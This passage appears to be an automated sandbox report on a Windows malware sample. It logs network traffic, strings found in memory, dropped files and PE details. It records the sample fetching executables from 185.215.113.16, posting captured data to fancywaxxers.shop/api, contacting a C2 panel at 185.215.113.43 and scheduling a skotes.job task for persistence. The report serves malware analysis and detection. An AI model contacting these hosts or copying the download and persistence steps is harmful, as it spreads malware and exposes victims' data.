                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeCode function: 5_2_00D5E0C0 recv,recv,recv,recv,5_2_00D5E0C0
                        Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                        Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                        Source: global trafficDNS traffic detected: DNS query: fancywaxxers.shop
                        Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop
                        Source: Dl6wuWiQdg.exe, 00000000.00000002.2304123008.0000000000825000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2301785939.000000000081C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/
                        Source: Dl6wuWiQdg.exe, 00000000.00000002.2304123008.0000000000825000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2316767012.00000000053B9000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302459604.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2301785939.000000000081C000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2303943645.0000000000817000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/mine/random.exe
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2302459604.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2303943645.0000000000817000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/mine/random.exeN4
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2302459604.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2303943645.0000000000817000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/mine/random.exeoSP&K
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2302459604.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2303943645.0000000000817000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/mine/random.exet
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2302459604.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2303943645.0000000000817000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exeV
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2302459604.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2303943645.0000000000817000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exeW
                        Source: skotes.exe, 00000009.00000003.3209003950.0000000001687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
                        Source: skotes.exe, 00000009.00000002.3374357149.000000000166E000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3209003950.0000000001676000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php%/
                        Source: skotes.exe, 00000009.00000002.3374357149.000000000166E000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3209003950.0000000001676000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php)/
                        Source: skotes.exe, 00000009.00000002.3374357149.000000000166E000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3209003950.0000000001676000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php1/
                        Source: skotes.exe, 00000009.00000002.3374357149.000000000166E000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3209003950.0000000001676000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpE/
                        Source: skotes.exe, 00000009.00000002.3374357149.000000000166E000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3209003950.0000000001676000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpI/
                        Source: skotes.exe, 00000009.00000002.3374357149.0000000001687000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3209003950.0000000001687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpR
                        Source: skotes.exe, 00000009.00000002.3374357149.0000000001687000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3209003950.0000000001687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpS
                        Source: skotes.exe, 00000009.00000002.3374357149.0000000001687000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3209003950.0000000001687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpa
                        Source: skotes.exe, 00000009.00000002.3374357149.000000000166E000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3209003950.0000000001676000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpa/
                        Source: skotes.exe, 00000009.00000002.3374357149.000000000166E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpded
                        Source: skotes.exe, 00000009.00000002.3374357149.0000000001687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpn
                        Source: skotes.exe, 00000009.00000002.3374357149.000000000166E000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3209003950.0000000001676000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2185238206.00000000053F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2185238206.00000000053F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2302459604.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2208865107.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2199166936.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2214091045.00000000007B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microh
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2185238206.00000000053F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2185238206.00000000053F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2185238206.00000000053F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2185238206.00000000053F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2185238206.00000000053F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2185238206.00000000053F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2185238206.00000000053F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2185238206.00000000053F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2185238206.00000000053F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2157306984.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2157238039.00000000053FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2196903882.000000000083A000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2196883539.0000000000833000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2196903882.000000000083A000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2196883539.0000000000833000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2157306984.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2157238039.00000000053FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2157306984.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2157238039.00000000053FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2157306984.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2157238039.00000000053FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2196903882.000000000083A000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2196883539.0000000000833000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2196903882.000000000083A000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2196883539.0000000000833000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2157306984.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2157238039.00000000053FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2157306984.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2157238039.00000000053FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2157306984.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2157238039.00000000053FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2302459604.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2303943645.0000000000817000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/ah
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2208498531.0000000000823000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2304123008.0000000000825000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2208865107.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2301785939.000000000081C000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2199107925.000000000081D000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2219903539.000000000081D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/api
                        Source: Dl6wuWiQdg.exe, 00000000.00000002.2304123008.0000000000825000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2301785939.000000000081C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/api$F
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2208865107.00000000007B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/apih
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2208795248.0000000000815000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2213997207.0000000000814000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302459604.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2235345701.0000000000815000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2303943645.0000000000817000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/hn7:C
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2208795248.0000000000815000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2213997207.0000000000814000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302459604.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2235345701.0000000000815000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2303943645.0000000000817000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/in
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2184395617.0000000000833000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2184484436.000000000083C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop:443/api
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2219903539.000000000083D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop:443/apiDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2196883539.0000000000833000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2186314902.00000000054D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2186314902.00000000054D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2196903882.000000000083A000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2196883539.0000000000833000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2157306984.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2157238039.00000000053FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2157306984.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2157238039.00000000053FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2186181930.00000000053F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2186181930.00000000053F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2186314902.00000000054D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2186314902.00000000054D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2186314902.00000000054D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                        Source: Dl6wuWiQdg.exe, 00000000.00000003.2196903882.000000000083A000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2196883539.0000000000833000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                        Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49712 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49713 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49715 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49716 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49717 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49718 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49725 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49742 version: TLS 1.2

                        System Summary

                        barindex
                        Source: Dl6wuWiQdg.exeStatic PE information: section name:
                        Source: Dl6wuWiQdg.exeStatic PE information: section name: .idata
                        Source: Dl6wuWiQdg.exeStatic PE information: section name:
                        Source: 8WYS1MQTL0QCOHKIPL8.exe.0.drStatic PE information: section name:
                        Source: 8WYS1MQTL0QCOHKIPL8.exe.0.drStatic PE information: section name: .idata
                        Source: skotes.exe.5.drStatic PE information: section name:
                        Source: skotes.exe.5.drStatic PE information: section name: .idata
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess Stats: CPU usage > 49%
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_0079CB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,9_2_0079CB97
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeCode function: 5_2_00D55C835_2_00D55C83
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeCode function: 5_2_00D5735A5_2_00D5735A
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeCode function: 5_2_00D988605_2_00D98860
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeCode function: 5_2_00D54DE05_2_00D54DE0
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeCode function: 5_2_00D54B305_2_00D54B30
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_007C88606_2_007C8860
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_007C70496_2_007C7049
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_007C78BB6_2_007C78BB
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_007C31A86_2_007C31A8
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00784B306_2_00784B30
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_007C2D106_2_007C2D10
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00784DE06_2_00784DE0
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_007B7F366_2_007B7F36
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_007C779B6_2_007C779B
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_007C88607_2_007C8860
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_007C70497_2_007C7049
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_007C78BB7_2_007C78BB
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_007C31A87_2_007C31A8
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_00784B307_2_00784B30
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_007C2D107_2_007C2D10
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_00784DE07_2_00784DE0
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_007B7F367_2_007B7F36
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_007C779B7_2_007C779B
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_007A61929_2_007A6192
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_0078E5309_2_0078E530
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_007C88609_2_007C8860
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_00784B309_2_00784B30
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_007C2D109_2_007C2D10
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_00784DE09_2_00784DE0
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_007A0E139_2_007A0E13
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_007C70499_2_007C7049
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_007C31A89_2_007C31A8
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_007A16029_2_007A1602
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_007C779B9_2_007C779B
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_007C78BB9_2_007C78BB
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_007A3DF19_2_007A3DF1
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_007B7F369_2_007B7F36
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 0079D663 appears 40 times
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 0079D942 appears 86 times
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 007980C0 appears 391 times
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 0079DF80 appears 82 times
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 007B8E10 appears 47 times
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 0079D64E appears 79 times
